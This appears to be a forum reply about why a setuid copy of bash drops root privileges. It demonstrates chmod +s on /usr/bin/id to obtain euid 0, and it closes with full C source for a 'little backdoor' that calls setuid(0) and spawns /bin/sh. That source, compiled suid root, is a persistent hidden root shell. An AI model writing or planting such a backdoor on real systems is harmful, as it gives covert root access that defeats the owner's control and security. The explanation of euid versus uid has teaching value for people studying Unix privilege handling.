because the suid bit influes only the Effective UID, and there is somewhere in the bash code a setuid(getuid) to drop root rights (if executed by non root) try /bin/bash1 (I have this on my slack 8) or other shell ; they might give you your expected rootshell. look at this : bash-2.05# id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),16(halt) bash-2.05# chmod +s /usr/bin/id bash-2.05# exit bash-2.05$ id uid=1000(spacewalker) gid=100(users) euid=0(root) egid=1(bin) groups=100(users),16(halt) if you want to program a little backdoor who gives you a rootshell, you have to set your uid to 0. the kernel will give you the uid 0 because you have the 0 euid effect : #include <stdio.h> int main(){ setuid(0); if(getuid()){ printf("program not suid root\n"); } else { system("/bin/sh"); } return 0; }
I hope I respond to your question...